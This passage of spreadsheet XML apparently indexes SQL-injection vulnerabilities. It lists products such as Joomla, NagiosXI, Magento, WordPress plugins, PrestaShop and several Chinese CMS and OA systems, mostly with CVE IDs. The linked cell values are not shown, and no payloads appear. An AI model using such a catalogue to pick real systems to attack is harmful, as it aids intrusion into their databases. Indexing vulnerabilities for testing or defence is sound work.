      <c r="D8" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Joomla_SQL注入_CVE-2017-8917</v>
      </c>
      <c r="E8" s="6" t="s">
        <v>32</v>
      </c>
      <c r="F8" s="4" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="9" s="4" customFormat="1" spans="1:6">
      <c r="A9" s="2" t="s">
        <v>34</v>
      </c>
      <c r="B9" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C9" s="2" t="s">
        <v>35</v>
      </c>
      <c r="D9" s="2" t="str">
        <f t="shared" si="0"/>
        <v>SubrionCMS_SQL注入_CVE-2017-11444</v>
      </c>
      <c r="E9" s="6" t="s">
        <v>36</v>
      </c>
      <c r="F9" s="4" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="10" s="4" customFormat="1" spans="1:6">
      <c r="A10" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B10" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C10" s="2" t="s">
        <v>38</v>
      </c>
      <c r="D10" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Joomla_SQL注入_CVE-2018-7314</v>
      </c>
      <c r="E10" s="6" t="s">
        <v>39</v>
      </c>
      <c r="F10" s="4" t="s">
        <v>40</v>
      </c>
    </row>
    <row r="11" s="4" customFormat="1" spans="1:6">
      <c r="A11" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B11" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C11" s="2" t="s">
        <v>41</v>
      </c>
      <c r="D11" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Joomla_SQL注入_CVE-2018-6605</v>
      </c>
      <c r="E11" s="6" t="s">
        <v>42</v>
      </c>
      <c r="F11" s="4" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="12" s="4" customFormat="1" spans="1:6">
      <c r="A12" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B12" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C12" s="2" t="s">
        <v>44</v>
      </c>
      <c r="D12" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Joomla_SQL注入_CVE-2018-17254</v>
      </c>
      <c r="E12" s="6" t="s">
        <v>45</v>
      </c>
      <c r="F12" s="4" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="13" s="4" customFormat="1" spans="1:6">
      <c r="A13" s="2" t="s">
        <v>47</v>
      </c>
      <c r="B13" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C13" s="2" t="s">
        <v>48</v>
      </c>
      <c r="D13" s="2" t="str">
        <f t="shared" si="0"/>
        <v>NagiosXI_SQL注入_CVE-2018-10736</v>
      </c>
      <c r="E13" s="6" t="s">
        <v>49</v>
      </c>
      <c r="F13" s="4" t="s">
        <v>50</v>
      </c>
    </row>
    <row r="14" s="4" customFormat="1" spans="1:6">
      <c r="A14" s="2" t="s">
        <v>47</v>
      </c>
      <c r="B14" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C14" s="2" t="s">
        <v>51</v>
      </c>
      <c r="D14" s="2" t="str">
        <f t="shared" si="0"/>
        <v>NagiosXI_SQL注入_CVE-2018-10735</v>
      </c>
      <c r="E14" s="6" t="s">
        <v>52</v>
      </c>
      <c r="F14" s="4" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="15" s="4" customFormat="1" spans="1:6">
      <c r="A15" s="2" t="s">
        <v>54</v>
      </c>
      <c r="B15" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C15" s="2" t="s">
        <v>55</v>
      </c>
      <c r="D15" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Lansweeper _SQL注入_CVE-2019-13462</v>
      </c>
      <c r="E15" s="6" t="s">
        <v>56</v>
      </c>
      <c r="F15" s="4" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="16" s="4" customFormat="1" spans="1:6">
      <c r="A16" s="2" t="s">
        <v>58</v>
      </c>
      <c r="B16" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C16" s="2" t="s">
        <v>59</v>
      </c>
      <c r="D16" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Magento_SQL注入_CVE-2019-7139</v>
      </c>
      <c r="E16" s="6" t="s">
        <v>60</v>
      </c>
      <c r="F16" s="4" t="s">
        <v>61</v>
      </c>
    </row>
    <row r="17" s="4" customFormat="1" spans="1:6">
      <c r="A17" s="2" t="s">
        <v>62</v>
      </c>
      <c r="B17" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C17" s="2" t="s">
        <v>63</v>
      </c>
      <c r="D17" s="2" t="str">
        <f t="shared" si="0"/>
        <v>米拓_SQL注入_CVE-2019-17418</v>
      </c>
      <c r="E17" s="6" t="s">
        <v>64</v>
      </c>
      <c r="F17" s="4" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="18" s="4" customFormat="1" spans="1:6">
      <c r="A18" s="2" t="s">
        <v>62</v>
      </c>
      <c r="B18" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C18" s="2" t="s">
        <v>66</v>
      </c>
      <c r="D18" s="2" t="str">
        <f t="shared" si="0"/>
        <v>米拓_SQL注入_CVE-2019-16996</v>
      </c>
      <c r="E18" s="6" t="s">
        <v>67</v>
      </c>
      <c r="F18" s="4" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="19" s="4" customFormat="1" spans="1:6">
      <c r="A19" s="2" t="s">
        <v>69</v>
      </c>
      <c r="B19" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C19" s="2" t="s">
        <v>70</v>
      </c>
      <c r="D19" s="2" t="str">
        <f t="shared" si="0"/>
        <v>PHPSHE_SQL注入_CVE-2019-9762</v>
      </c>
      <c r="E19" s="6" t="s">
        <v>71</v>
      </c>
      <c r="F19" s="4" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="20" s="4" customFormat="1" spans="1:6">
      <c r="A20" s="2" t="s">
        <v>73</v>
      </c>
      <c r="B20" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C20" s="2" t="s">
        <v>74</v>
      </c>
      <c r="D20" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Teclib GLPI_SQL注入_CVE-2019-10232</v>
      </c>
      <c r="E20" s="6" t="s">
        <v>75</v>
      </c>
      <c r="F20" s="4" t="s">
        <v>76</v>
      </c>
    </row>
    <row r="21" s="4" customFormat="1" spans="1:6">
      <c r="A21" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B21" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C21" s="2" t="s">
        <v>78</v>
      </c>
      <c r="D21" s="2" t="str">
        <f t="shared" si="0"/>
        <v>WordPress_SQL注入_CVE-2019-10692</v>
      </c>
      <c r="E21" s="6" t="s">
        <v>79</v>
      </c>
      <c r="F21" s="4" t="s">
        <v>80</v>
      </c>
    </row>
    <row r="22" s="4" customFormat="1" spans="1:6">
      <c r="A22" s="2" t="s">
        <v>81</v>
      </c>
      <c r="B22" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C22" s="2" t="s">
        <v>82</v>
      </c>
      <c r="D22" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Artica Web Proxy_SQL注入_CVE-2020-17506</v>
      </c>
      <c r="E22" s="6" t="s">
        <v>83</v>
      </c>
      <c r="F22" s="4" t="s">
        <v>84</v>
      </c>
    </row>
    <row r="23" s="4" customFormat="1" spans="1:6">
      <c r="A23" s="2" t="s">
        <v>85</v>
      </c>
      <c r="B23" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C23" s="2" t="s">
        <v>86</v>
      </c>
      <c r="D23" s="2" t="str">
        <f t="shared" si="0"/>
        <v>微擎_SQL注入_CVE-2020-20300</v>
      </c>
      <c r="E23" s="6" t="s">
        <v>87</v>
      </c>
      <c r="F23" s="4" t="s">
        <v>88</v>
      </c>
    </row>
    <row r="24" s="4" customFormat="1" spans="1:6">
      <c r="A24" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B24" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C24" s="2" t="s">
        <v>89</v>
      </c>
      <c r="D24" s="2" t="str">
        <f t="shared" si="0"/>
        <v>WordPress_SQL注入_CVE-2020-14092</v>
      </c>
      <c r="E24" s="6" t="s">
        <v>90</v>
      </c>
      <c r="F24" s="4" t="s">
        <v>91</v>
      </c>
    </row>
    <row r="25" s="4" customFormat="1" spans="1:6">
      <c r="A25" s="2" t="s">
        <v>92</v>
      </c>
      <c r="B25" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C25" s="2" t="s">
        <v>93</v>
      </c>
      <c r="D25" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Chamilo model_SQL注入_CVE-2021-34187</v>
      </c>
      <c r="E25" s="6" t="s">
        <v>94</v>
      </c>
      <c r="F25" s="4" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="26" s="4" customFormat="1" spans="1:6">
      <c r="A26" s="2" t="s">
        <v>96</v>
      </c>
      <c r="B26" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C26" s="2" t="s">
        <v>97</v>
      </c>
      <c r="D26" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Layer Meshery_SQL注入_CVE-2021-31856</v>
      </c>
      <c r="E26" s="6" t="s">
        <v>98</v>
      </c>
      <c r="F26" s="4" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="27" s="4" customFormat="1" spans="1:6">
      <c r="A27" s="2" t="s">
        <v>100</v>
      </c>
      <c r="B27" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C27" s="2" t="s">
        <v>101</v>
      </c>
      <c r="D27" s="2" t="str">
        <f t="shared" si="0"/>
        <v>PrestaHome Blog for PrestaShop_SQL注入_CVE-2021-36748</v>
      </c>
      <c r="E27" s="6" t="s">
        <v>102</v>
      </c>
      <c r="F27" s="4" t="s">
        <v>103</v>
      </c>
    </row>
    <row r="28" s="4" customFormat="1" spans="1:6">
      <c r="A28" s="2" t="s">
        <v>104</v>
      </c>
      <c r="B28" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C28" s="2" t="s">
        <v>105</v>
      </c>
      <c r="D28" s="2" t="str">
        <f t="shared" si="0"/>
        <v>PrestaShop_SQL注入_CVE-2021-37538</v>
      </c>
      <c r="E28" s="6" t="s">
        <v>106</v>
      </c>
      <c r="F28" s="4" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="29" s="4" customFormat="1" spans="1:6">
      <c r="A29" s="2" t="s">
        <v>108</v>
      </c>
      <c r="B29" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C29" s="2" t="s">
        <v>109</v>
      </c>
      <c r="D29" s="2" t="str">
        <f t="shared" si="0"/>
        <v>WooCommerce_SQL注入_CVE-2021-32789</v>
      </c>
      <c r="E29" s="6" t="s">
        <v>110</v>
      </c>
      <c r="F29" s="4" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="30" s="4" customFormat="1" spans="1:6">
      <c r="A30" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B30" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C30" s="2" t="s">
        <v>112</v>
      </c>
      <c r="D30" s="2" t="str">
        <f t="shared" si="0"/>
        <v>WordPress_SQL注入_CVE-2021-24666</v>
      </c>
      <c r="E30" s="6" t="s">
        <v>113</v>
      </c>
      <c r="F30" s="4" t="s">
        <v>114</v>
      </c>
    </row>
    <row r="31" s="4" customFormat="1" spans="1:6">
      <c r="A31" s="2" t="s">
        <v>115</v>
      </c>
      <c r="B31" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C31" s="2" t="s">
        <v>116</v>
      </c>
      <c r="D31" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Casdoor_SQL注入_CVE-2022-24124</v>
      </c>
      <c r="E31" s="6" t="s">
        <v>117</v>
      </c>
      <c r="F31" s="4" t="s">
        <v>118</v>
      </c>
    </row>
    <row r="32" s="4" customFormat="1" spans="1:6">
      <c r="A32" s="2" t="s">
        <v>119</v>
      </c>
      <c r="B32" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C32" s="2" t="s">
        <v>120</v>
      </c>
      <c r="D32" s="2" t="str">
        <f t="shared" si="0"/>
        <v>MapSVG_SQL注入_CVE-2022-0592</v>
      </c>
      <c r="E32" s="6" t="s">
        <v>121</v>
      </c>
      <c r="F32" s="4" t="s">
        <v>122</v>
      </c>
    </row>
    <row r="33" s="4" customFormat="1" spans="1:6">
      <c r="A33" s="2" t="s">
        <v>123</v>
      </c>
      <c r="B33" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C33" s="2" t="s">
        <v>124</v>
      </c>
      <c r="D33" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Microfinance Management System_SQL注入_CVE-2022-27927</v>
      </c>
      <c r="E33" s="6" t="s">
        <v>125</v>
      </c>
      <c r="F33" s="4" t="s">
        <v>126</v>
      </c>
    </row>
    <row r="34" s="4" customFormat="1" spans="1:6">
      <c r="A34" s="2" t="s">
        <v>127</v>
      </c>
      <c r="B34" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C34" s="2" t="s">
        <v>128</v>
      </c>
      <c r="D34" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Online Fire Reporting System_SQL注入_CVE-2022-31974</v>
      </c>
      <c r="E34" s="6" t="s">
        <v>129</v>
      </c>
      <c r="F34" s="4" t="s">
        <v>130</v>
      </c>
    </row>
    <row r="35" s="4" customFormat="1" spans="1:6">
      <c r="A35" s="2" t="s">
        <v>131</v>
      </c>
      <c r="B35" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C35" s="2" t="s">
        <v>132</v>
      </c>
      <c r="D35" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Photo Gallery_SQL注入_CVE-2022-0169</v>
      </c>
      <c r="E35" s="6" t="s">
        <v>133</v>
      </c>
      <c r="F35" s="4" t="s">
        <v>134</v>
      </c>
    </row>
    <row r="36" s="4" customFormat="1" spans="1:6">
      <c r="A36" s="2" t="s">
        <v>135</v>
      </c>
      <c r="B36" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C36" s="2" t="s">
        <v>136</v>
      </c>
      <c r="D36" s="2" t="str">
        <f t="shared" si="0"/>
        <v>PHPJabbers_SQL注入_CVE-2023-40748</v>
      </c>
      <c r="E36" s="6" t="s">
        <v>137</v>
      </c>
      <c r="F36" s="4" t="s">
        <v>138</v>
      </c>
    </row>
    <row r="37" s="4" customFormat="1" spans="1:6">
      <c r="A37" s="2" t="s">
        <v>139</v>
      </c>
      <c r="B37" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C37" s="2" t="s">
        <v>140</v>
      </c>
      <c r="D37" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Purchase Order Management_SQL注入_CVE-2023-2130</v>
      </c>
      <c r="E37" s="6" t="s">
        <v>141</v>
      </c>
      <c r="F37" s="4" t="s">
        <v>142</v>
      </c>
    </row>
    <row r="38" s="4" customFormat="1" spans="1:6">
      <c r="A38" s="2" t="s">
        <v>143</v>
      </c>
      <c r="B38" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C38" s="2" t="s">
        <v>144</v>
      </c>
      <c r="D38" s="2" t="str">
        <f t="shared" si="0"/>
        <v>CyberPower_SQL注入_CVE-2024-32737</v>
      </c>
      <c r="E38" s="6" t="s">
        <v>145</v>
      </c>
      <c r="F38" s="4" t="s">
        <v>146</v>
      </c>
    </row>
    <row r="39" s="4" customFormat="1" spans="1:6">
      <c r="A39" s="2" t="s">
        <v>147</v>
      </c>
      <c r="B39" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C39" s="2" t="s">
        <v>148</v>
      </c>
      <c r="D39" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Exrick XMall_SQL注入_CVE-2024-24112</v>
      </c>
      <c r="E39" s="6" t="s">
        <v>149</v>
      </c>
      <c r="F39" s="4" t="s">
        <v>150</v>
      </c>
    </row>
    <row r="40" s="4" customFormat="1" spans="1:6">
      <c r="A40" s="2" t="s">
        <v>151</v>
      </c>
      <c r="B40" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C40" s="2" t="s">
        <v>152</v>
      </c>
      <c r="D40" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Riello Netman_SQL注入_CVE-2024-8877</v>
      </c>
      <c r="E40" s="6" t="s">
        <v>153</v>
      </c>
      <c r="F40" s="4" t="s">
        <v>154</v>
      </c>
    </row>
    <row r="41" s="4" customFormat="1" spans="1:6">
      <c r="A41" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B41" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C41" s="2" t="s">
        <v>155</v>
      </c>
      <c r="D41" s="2" t="str">
        <f t="shared" si="0"/>
        <v>WordPress_SQL注入_CVE-2024-32709</v>
      </c>
      <c r="E41" s="6" t="s">
        <v>156</v>
      </c>
      <c r="F41" s="4" t="s">
        <v>157</v>
      </c>
    </row>
    <row r="42" s="4" customFormat="1" spans="1:6">
      <c r="A42" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B42" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C42" s="2" t="s">
        <v>158</v>
      </c>
      <c r="D42" s="2" t="str">
        <f t="shared" si="0"/>
        <v>WordPress_SQL注入_CVE-2024-5522</v>
      </c>
      <c r="E42" s="6" t="s">
        <v>159</v>
      </c>
      <c r="F42" s="4" t="s">
        <v>160</v>
      </c>
    </row>
    <row r="43" s="4" customFormat="1" spans="1:6">
      <c r="A43" s="2" t="s">
        <v>161</v>
      </c>
      <c r="B43" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C43" s="2" t="s">
        <v>162</v>
      </c>
      <c r="D43" s="2" t="str">
        <f t="shared" si="0"/>
        <v>IdeaCMS_SQL注入_CVE-2025-5569</v>
      </c>
      <c r="E43" s="6" t="s">
        <v>163</v>
      </c>
      <c r="F43" s="4" t="s">
        <v>164</v>
      </c>
    </row>
    <row r="44" s="4" customFormat="1" spans="1:6">
      <c r="A44" s="2" t="s">
        <v>165</v>
      </c>
      <c r="B44" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C44" s="2" t="s">
        <v>166</v>
      </c>
      <c r="D44" s="2" t="str">
        <f t="shared" si="0"/>
        <v>NetMRI_SQL注入_CVE-2025-32814</v>
      </c>
      <c r="E44" s="6" t="s">
        <v>167</v>
      </c>
      <c r="F44" s="4" t="s">
        <v>168</v>
      </c>
    </row>
    <row r="45" s="4" customFormat="1" spans="1:6">
      <c r="A45" s="2" t="s">
        <v>169</v>
      </c>
      <c r="B45" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C45" s="2" t="s">
        <v>170</v>
      </c>
      <c r="D45" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Slider &amp; Popup Builder_SQL注入_CVE-2025-2011</v>
      </c>
      <c r="E45" s="6" t="s">
        <v>171</v>
      </c>
      <c r="F45" s="4" t="s">
        <v>172</v>
      </c>
    </row>
    <row r="46" s="4" customFormat="1" spans="1:6">
      <c r="A46" s="2" t="s">
        <v>27</v>
      </c>
      <c r="B46" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C46" s="2"/>
      <c r="D46" s="2" t="str">
        <f t="shared" si="0"/>
        <v>织梦_SQL注入</v>
      </c>
      <c r="E46" s="6" t="s">
        <v>173</v>
      </c>
      <c r="F46" s="4" t="s">
        <v>174</v>
      </c>
    </row>
    <row r="47" s="4" customFormat="1" spans="1:6">
      <c r="A47" s="2" t="s">
        <v>175</v>
      </c>
      <c r="B47" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C47" s="2"/>
      <c r="D47" s="2" t="str">
        <f t="shared" si="0"/>
        <v>帆软_SQL注入</v>
      </c>
      <c r="E47" s="6" t="s">
        <v>176</v>
      </c>
      <c r="F47" s="4" t="s">
        <v>177</v>
      </c>
    </row>
    <row r="48" s="4" customFormat="1" spans="1:6">
      <c r="A48" s="2" t="s">
        <v>11</v>
      </c>
      <c r="B48" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C48" s="2"/>
      <c r="D48" s="2" t="str">
        <f t="shared" si="0"/>
        <v>宏景_SQL注入</v>
      </c>
      <c r="E48" s="6" t="s">
        <v>178</v>
      </c>
      <c r="F48" s="4" t="s">
        <v>179</v>
      </c>
    </row>
    <row r="49" s="4" customFormat="1" spans="1:6">
      <c r="A49" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B49" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C49" s="2"/>
      <c r="D49" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Joomla_SQL注入</v>
      </c>
      <c r="E49" s="6" t="s">
        <v>180</v>
      </c>
      <c r="F49" s="4" t="s">
        <v>181</v>
      </c>
    </row>
    <row r="50" s="4" customFormat="1" spans="1:6">
      <c r="A50" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B50" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C50" s="2"/>
      <c r="D50" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Joomla_SQL注入</v>
      </c>
      <c r="E50" s="6" t="s">
        <v>182</v>
      </c>
      <c r="F50" s="4" t="s">
        <v>183</v>
      </c>
    </row>
    <row r="51" s="4" customFormat="1" spans="1:6">
      <c r="A51" s="2" t="s">
        <v>184</v>
      </c>
      <c r="B51" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C51" s="2"/>
      <c r="D51" s="2" t="str">
        <f t="shared" si="0"/>
        <v>蓝凌_SQL注入</v>
      </c>
      <c r="E51" s="6" t="s">
        <v>185</v>
      </c>
      <c r="F51" s="4" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="52" s="4" customFormat="1" spans="1:6">
      <c r="A52" s="2" t="s">
        <v>187</v>
      </c>
      <c r="B52" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C52" s="2"/>
      <c r="D52" s="2" t="str">
        <f t="shared" si="0"/>
        <v>AeroCMS_SQL注入</v>
      </c>
      <c r="E52" s="6" t="s">
        <v>188</v>
      </c>
      <c r="F52" s="4" t="s">
        <v>189</v>
      </c>
    </row>
    <row r="53" s="4" customFormat="1" spans="1:6">
      <c r="A53" s="2" t="s">
        <v>190</v>
      </c>
      <c r="B53" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C53" s="2"/>
      <c r="D53" s="2" t="str">
        <f t="shared" si="0"/>
        <v>DotnetCMS_SQL注入</v>
      </c>
      <c r="E53" s="6" t="s">
        <v>191</v>
      </c>
      <c r="F53" s="4" t="s">
        <v>192</v>
      </c>
    </row>
    <row r="54" s="4" customFormat="1" spans="1:6">
      <c r="A54" s="2" t="s">
        <v>193</v>
      </c>
      <c r="B54" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C54" s="2"/>
      <c r="D54" s="2" t="str">
        <f t="shared" si="0"/>
        <v>多米CMS_SQL注入</v>
      </c>
      <c r="E54" s="6" t="s">
        <v>194</v>
      </c>
      <c r="F54" s="4" t="s">
        <v>195</v>
      </c>
    </row>
    <row r="55" s="4" customFormat="1" spans="1:6">
      <c r="A55" s="2" t="s">
        <v>196</v>
      </c>
      <c r="B55" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C55" s="2"/>
      <c r="D55" s="2" t="str">
        <f t="shared" si="0"/>
        <v>ECTouch_SQL注入</v>
      </c>
      <c r="E55" s="6" t="s">
        <v>197</v>
      </c>
      <c r="F55" s="4" t="s">
        <v>198</v>
      </c>
    </row>
    <row r="56" s="4" customFormat="1" spans="1:6">
      <c r="A56" s="2" t="s">
        <v>199</v>
      </c>
      <c r="B56" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C56" s="2"/>
      <c r="D56" s="2" t="str">
        <f t="shared" si="0"/>
        <v>FineCMS_SQL注入</v>
      </c>
      <c r="E56" s="6" t="s">
        <v>200</v>
      </c>
      <c r="F56" s="4" t="s">
        <v>201</v>
      </c>
    </row>
    <row r="57" s="4" customFormat="1" spans="1:6">
      <c r="A57" s="2" t="s">
        <v>202</v>
      </c>
      <c r="B57" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C57" s="2"/>
      <c r="D57" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Fumasoft Cloud_SQL注入</v>
      </c>
      <c r="E57" s="6" t="s">
        <v>203</v>
      </c>
      <c r="F57" s="4" t="s">
        <v>204</v>
      </c>
    </row>
    <row r="58" s="4" customFormat="1" spans="1:6">
      <c r="A58" s="2" t="s">
        <v>205</v>
      </c>
      <c r="B58" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C58" s="2"/>
      <c r="D58" s="2" t="str">
        <f t="shared" si="0"/>
        <v>JeePlusCMS_SQL注入</v>
      </c>
      <c r="E58" s="6" t="s">
        <v>206</v>
      </c>
      <c r="F58" s="4" t="s">
        <v>207</v>
      </c>
    </row>
    <row r="59" s="4" customFormat="1" spans="1:6">
      <c r="A59" s="2" t="s">
        <v>208</v>
      </c>
      <c r="B59" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C59" s="2"/>
      <c r="D59" s="2" t="str">
        <f t="shared" si="0"/>
        <v>PHPOK_SQL注入</v>
      </c>
      <c r="E59" s="6" t="s">
        <v>209</v>
      </c>
      <c r="F59" s="4" t="s">
        <v>210</v>
      </c>
    </row>
    <row r="60" s="4" customFormat="1" spans="1:6">
      <c r="A60" s="2" t="s">
        <v>211</v>
      </c>
      <c r="B60" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C60" s="2"/>
      <c r="D60" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Phuket SolutionCMS_SQL注入</v>
      </c>
      <c r="E60" s="6" t="s">
        <v>212</v>
      </c>
      <c r="F60" s="4" t="s">
        <v>213</v>
      </c>
    </row>
    <row r="61" s="4" customFormat="1" spans="1:6">
      <c r="A61" s="2" t="s">
        <v>214</v>
      </c>
      <c r="B61" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C61" s="2"/>
      <c r="D61" s="2" t="str">
        <f t="shared" si="0"/>
        <v>海洋CMS_SQL注入</v>
      </c>
      <c r="E61" s="6" t="s">
        <v>215</v>
      </c>
      <c r="F61" s="4" t="s">
        <v>216</v>
      </c>
    </row>
    <row r="62" s="4" customFormat="1" spans="1:6">
      <c r="A62" s="2" t="s">
        <v>217</v>
      </c>
      <c r="B62" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C62" s="2"/>
      <c r="D62" s="2" t="str">
        <f t="shared" si="0"/>
        <v>五指CMS_SQL注入</v>
      </c>
      <c r="E62" s="6" t="s">
        <v>218</v>
      </c>
      <c r="F62" s="4" t="s">
        <v>219</v>
      </c>
    </row>
    <row r="63" s="4" customFormat="1" spans="1:6">
      <c r="A63" s="2" t="s">
        <v>220</v>
      </c>
      <c r="B63" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C63" s="2"/>
      <c r="D63" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Xhibiter NFT Marketplace_SQL注入</v>
      </c>
      <c r="E63" s="6" t="s">
        <v>221</v>
      </c>
      <c r="F63" s="4" t="s">
        <v>222</v>
      </c>
    </row>
    <row r="64" s="4" customFormat="1" spans="1:6">
      <c r="A64" s="2" t="s">
        <v>223</v>
      </c>
      <c r="B64" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C64" s="2"/>
      <c r="D64" s="2" t="str">
        <f t="shared" si="0"/>
        <v>YesWiki_SQL注入</v>
      </c>
      <c r="E64" s="6" t="s">
        <v>224</v>
      </c>
      <c r="F64" s="4" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="65" s="4" customFormat="1" spans="1:6">
      <c r="A65" s="2" t="s">
        <v>226</v>
      </c>
      <c r="B65" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C65" s="2"/>
      <c r="D65" s="2" t="str">
        <f t="shared" si="0"/>
        <v>ZZZCMS_SQL注入</v>
      </c>
      <c r="E65" s="6" t="s">
        <v>227</v>
      </c>
      <c r="F65" s="4" t="s">
        <v>228</v>
      </c>
    </row>
    <row r="66" s="4" customFormat="1" spans="1:6">
      <c r="A66" s="2" t="s">
        <v>229</v>
      </c>
      <c r="B66" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C66" s="2"/>
      <c r="D66" s="2" t="str">
        <f t="shared" ref="D66:D129" si="1">_xlfn.TEXTJOIN("_",TRUE,A66:C66)</f>
        <v>致翔_SQL注入</v>
      </c>
      <c r="E66" s="6" t="s">
        <v>230</v>
      </c>
      <c r="F66" s="4" t="s">
        <v>231</v>
      </c>
    </row>
    <row r="67" s="4" customFormat="1" spans="1:6">
      <c r="A67" s="2" t="s">
        <v>232</v>
      </c>
      <c r="B67" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C67" s="2"/>
      <c r="D67" s="2" t="str">
        <f t="shared" si="1"/>
        <v>致远OA_SQL注入</v>
      </c>
      <c r="E67" s="6" t="s">
        <v>233</v>
      </c>
      <c r="F67" s="4" t="s">
        <v>234</v>
      </c>
    </row>
    <row r="68" s="4" customFormat="1" spans="1:6">
      <c r="A68" s="2" t="s">
        <v>235</v>
      </c>
      <c r="B68" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C68" s="2"/>
      <c r="D68" s="2" t="str">
        <f t="shared" si="1"/>
        <v>ShiziyuCMS Api Controller_SQL注入</v>
      </c>
      <c r="E68" s="6" t="s">
        <v>236</v>
      </c>
      <c r="F68" s="4" t="s">
        <v>237</v>
      </c>
    </row>
    <row r="69" s="4" customFormat="1" spans="1:6">
      <c r="A69" s="2" t="s">
        <v>238</v>
      </c>
      <c r="B69" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C69" s="2"/>
      <c r="D69" s="2" t="str">
        <f t="shared" si="1"/>
        <v>Arcade_SQL注入</v>
      </c>
      <c r="E69" s="6" t="s">
        <v>239</v>
      </c>
      <c r="F69" s="4" t="s">
        <v>240</v>
      </c>
    </row>
